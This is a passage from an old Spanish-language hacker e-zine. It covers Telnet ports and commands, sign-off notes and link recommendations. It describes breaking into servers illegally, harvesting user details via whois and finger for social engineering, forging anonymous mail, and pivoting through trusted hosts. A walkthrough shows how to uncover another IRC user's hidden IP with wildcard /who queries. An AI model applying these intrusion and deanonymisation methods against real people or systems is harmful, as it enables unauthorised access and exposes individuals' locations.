23---> Telnet: nos permite ingresar remotamente a un servidor ( generalmente nos pide username y password).
25---> SMTP (Simple Mail Transfer Protocol):es el puerto utilizado para enviar e-mails.
37---> Time: Hora del sistema.
43---> Whois: nos da información sobre los usuarios del sistema.
70---> Gopher: Buscador de información.
79---> Finger: muestra la lista de ususarios conectados al sistema.
80/8080---> Http (Hypertext Transfer Protocol): Servidor Web.
8080/5580->Http Militar.
110--> Pop3 (Post Office Protocol 3): es el puerto utilizado para resivir e-mails (correo entrante).
119--> NNTP: Usenet News Groups, grupos de noticias de Usenet.
117--> UUCP (Unix To Unix Copy): Es un protocolo utilizado para copiar archivos de un servidor/máquina Unix a otra.
443--> Shttp (Secure HTTP): Servidor web "seguro".
513--> rlogin: Remote Login, login remoto.


6-Comandos.
  ========
 Los comandos de telnet varían de máquina en máquina, y se los puede consultar ingresando los comandos "help" , "man" o "?". Sin embargo, hay una serie de comandos que son comunes a todas las máquinas (o a casi todas):
telnet> open (hostname) : para conectarnos a otra máquina por medio de telnet.
whois> (nombre del usuario): nos da información sobre el usuario.
finger> (nombre del usuario): nos dice si ese usuario está conectado y, si lo está, nos dice que está haciendo, sino lo esta nos dice cuando se conectó por última vez.
sys : nos da información sobre el sistema (ej:qué sistema operativo corre).
quit : cierra la conexión.


 7-Usos del Telnet en el hacking.
   =============================
 El Telnet es básicamente (lo repito) la esencia del haching, sin él no nos sería posible conectarnos remotamente a otra computadora y manejarla como si la tuviéramos enfrente, ya que es imposible realizar ésto mediante la World Wide Web o mediante el correo, por ejemplo, porque estos servicios solo utilizan un puerto determinado y sólo nos dejan realizar ciertas tareas en la máquina remota.

Hackear un Servidor: El Telnet se utiliza fundamentalmente para entrar de forma ilegal a un servidor. Ésto se realiza mediante la búsqueda de fallas de seguridad (bugs) en todos los puertos de la máquina y mediante la explotación de esas fallas (exploits). Generalmente se utilizan fallas de seguridad conocidas y se trata de ver si ese servidor sigue siendo vulnerable a ella o si ya ha sido arreglado (los administradores del sistema suelen ser muy perezosos o ignorantes y no se informan correctamente de las nuevas fallas de seguridad existentes). Se pueden encontrar información sobre fallas recientes o pasadas en los siguientes sitios:
-http://www.securityfocus.com/
-http://www.anticode.com/
-http://www.technotronic.com/
-http://www.hack2600.com/
-http://home.cyberarmy.com/tcu/underground.html
-http://www.rootshell.com

 Whois (puerto 43): Se lo utiliza para obtener información sobre los usuarios del sistema,  y así convencerlos, mediante ingeniería social, que nos den su password, o diréctamente meterles un troyano con el mismo propósito.
Modo de uso: Conectarse al puerto 43 y ejecutar el comando [whois nombre_del_usuario_deseado] o, diréctamente [whois] (nos dará info del sistema, posiblemente del administrador o de la empresa dueña del server).

 Finger (puerto 79): Nos dice quienes estan conectados al sistema y que estan haciendo en ese momento. Aquí encontraremos victimas para el "whois".
Modo de uso: Conectarse al puerto 79 y ejecutar el comando [finger] ésto nos dará información sobre todos los usuarios del sistema. Si se quiere obtener información sobre un usuario particular, hacer [finger nombredeusuario] o [finger e-maildelusuario].

 Forge Mail (puerto 25): Se lo utiliza para mandar correos anónimos ( para más información, ver el artículo de Ingeniería Social en el N°1 de Datacode).

 Netstat y Systat (puertos 15 y 11): Ambos nos brindan información del sistema, lo cual es muy útil a la hora de buscar fallas de seguridad y/o de explotarlo. 
 El primero nos brinda información sobre el sistema en general: que sistema operativo usa y que versión, en qué máquina está corriendo, cuando se lo actualizó por última vez, etc. En cambio, el segundo nos da información sobre la conexiones llevadas a cabo por el servidor en ese momento, lo cual es útil por lo siguiente: generlamente, las máquinas que están conectadas entre si permanentemente o de forma seguida establecen una "política de confianza" (Trust policy) , que permite que se pueda saltar de un servidor a otro sin tener que ingresar ninguna contraseña adicional. Ésto lo hacen para ahorrar tiempo al realizar las conexiones y para que sea más cómodo trabajar. Esto nos sirve porque los servidores conectados a la máquina víctima pueden ser menos seguros y, si logramos ingresar a alguno de ellos, podremos acceder a nuestro objetivo sin tener que pasar por ningun control de seguridad.


-----------------------------------------------------------------------
Bueno, me despido por ahora. Espero que el artículo les sea de gran utilidad y les prometo que más adelante haré uno más completo (y más práctico que teórico). Mientras tanto, no dejen de visitar nuestra web para nuevas actualizaciones.
Saludos a todos.

                      -------------------->K0P1K4t<--------------------
                      ---------------->k0p1k4t@usa.com<----------------





                      *************************************************
                      ****************Resolviendo IPS******************
                      *************************************************
                      *******************Por ToTo********************** 
                      *************************************************




Aca pongo un metodo para sacar la ip si estamos chateando en un server como Ciudad (irc.prima.com.ar o irc.ciudad.com.ar ) y queremos averiguar la ip de otro flaco o lammer ;o)

Supongamos que queremos sacar el Host de alguien de nick "ToTo", y su ISP le da una IP de 10 caracteres, por ejemplo: host625901.ciudad.com.ar lo que haremos es esto.
en la ventana de Status del mIRC o de cualquier programa, ponemos el comando:

/who ToTo*!*@host??????.ciudad.com.ar

En este comando, podemos apreciar que hacemos un WHO a alguien de nick "ToTo", y con un Host que empiece con host, ya que el isp donde se encuentra, todos los Ip empiezan con Host. (Ojo, quizas no todos los Isp empiezan con host, ustedes lo cambiaran. Eso depende del Host de la victima) y que siga con caracteres que no conocemos, (ya que estan con las xxxxxx).Reemplazamos las x por Los "?", que sirven para reemplazar un caracter, o sea, un numero de su IP. De esa forma cuando ejecutemos ese comando, nos aparecera el nick de ToTo, pero aun con el host:  xxxxxxxxxx.ciudad.com.ar Ahora, para descubrir su Ip entera, debemos probar distintos numeros que posiblemente formen su Host, algo asi:

/who ToTo*!*@host1??????.ciudad.com.ar

ToTo* End of /WHO list

Si aparece esto, quiere decir que el "1", no es el primer numero de su Host. Entonces probamos otro numero.

/who ToTo*!*@host0?????.ciudad.com.ar

#hacking ToTo H+ ~ToTo@xxxxxxxxxx.ciudad.com.ar :0 ff
ToTo* End of /WHO list  

En cambio, cuando cambiamos el "1" por el "0", si aparece esto, quiere decir que el "0" es el primero numero de su Host.

Luego seguimos haciendo lo mismo con todos los "?".

/who ToTo*!*@host01????.ciudad.com.ar

#hacking ToTo H+ ~ToTo@xxxxxxxxxx.ciudad.com.ar :0 ff
ToTo* End of /WHO list  

/who ToTo*!*@host013???.ciudad.com.ar

#hacking ToTo H+ ~ToTo@xxxxxxxxxx.ciudad.com.ar :0 ff
ToTo* End of /WHO list  

/who ToTo*!*@host0138??.ciudad.com.ar

#hacking ToTo H+ ~ToTo@xxxxxxxxxx.ciudad.com.ar :0 ff
ToTo* End of /WHO list  

/who ToTo*!*@host01380?.ciudad.com.ar

#hacking ToTo H+ ~ToTo@xxxxxxxxxx.ciudad.com.ar :0 ff
ToTo* End of /WHO list  

/who ToTo*!*@host013801.ciudad.com.ar

#hacking ToTo H+ ~ToTo@xxxxxxxxxx.ciudad.com.ar :0 ff
ToTo* End of /WHO list  

Aqui vemos que fuimos probando numeros al azar y al "embocar" todos, sacamos su Host completo. Luego haciendo 

/dns host013801.ciudad.com.ar

*** Resolved host013801.ciudad.com.ar to 200.45.20.83

Sacamos su IP. MISION CUMPLIDA !!!
Si esto te parece muy jodido bajate el IRCAP (www.ircap.net) Este programa hace este trabajito por vos.





		            			                TOTO
                 						    el_tomy@hotmail.com
                     





                 *****************************************************
                 *****************NOSOTROS RECOMENDAMOS***************
                 *****************************************************
                 **********************Por SDHT***********************
                 *****************************************************


La idea de esto es recomendar algunas web que por alguna razon tienen nuestro reconocimiento, se trata de aquellas que no son muy conocidas, pero que tienen un valor unico para todos!!!.


Http://www.raravista.com

*Esta web seguramente ya se encuentra en el navegador de muchos, pero como es un gran portal underground latino no esta de mas nombrarlo y felicitarlos por el gran trabajo que hacen.


Http://www.zine-store.com.ar

*Lo de MAU es admirable realmente, tiene uno de los mayores archivos sobre Ezines que he visto, ademas muy bien cuidado. felicitaciones!!!

Htpp://www.hexagon.com.ar

*Un gran sitio, mucha info, novedades, mucho under!!! se actualiza semanalmente lo que la hace una opcion muy importante. Felicitaciones hexagon!!!

Htpp://www.vivalinux.com.ar

*Un completo sitio sobre linux, es de los tres mas grandes (www.planetalinux.com.ar y www.starlinux.com.ar) el que mas rapido se actualiza, cuando la noticia esta en alguno de los ultimos en vivalinux ya es vieja!!!.

Htpp://www.kebracho.cjb.com

*No se porque pero me rei mucho con esto, no dejen de visitarlo. Nada personal contra ezkracho. Que son junto con Digital Rebel y S.I.D.E los que manejan los hilos del hacking argentino (palabras de hell nose cuanto, uno de sus miembros. si ellos lo dicen... ;O) jaja


Http://www.puntokom.com.ar

*Una ezine Argentina que tiene mucho para mostrarte, Informacion, actualidad, H/P/V/C, etc.
La verdad es que hay que leerla o visitar su web!! que estas esperando!!!


Estas son todas las web, espero que les sean utiles.

                                                    
                                  						     												             				             SDHT 
                                             sweet_devils@mixmail.com
                                                 






                *************************************************
                ********************DESPEDIDA********************
                *****************DATACODE OFFLINE****************
                ************************************************* 
                      


Bueno asi llegamos al final de este numero, tengo que reconocer que ha sido un poco corto, pero es que queriamos sacar este y despues sacar uno mas grande dentro de poco tiempo, sepan disculpar si falta algo.

Trataremos que el proximo numero ya nos encuentre con la web trabajando al 100% (actualmente esta al 65% mas o menos) y con la mudanza de server ya hecha. Trataremos de traerles un completo informe de como clonar celulares en Argentina, programacion en c++, comenzamos con los virus y la informacion mas caliente de la operacion septiembre negro!!

No me gustan las despedidas, pero... ;O)

hasta siempre!!!!



                                        SWEET_DEVILS HACK TEAM
				     	         sweet_devils@mixmail.com





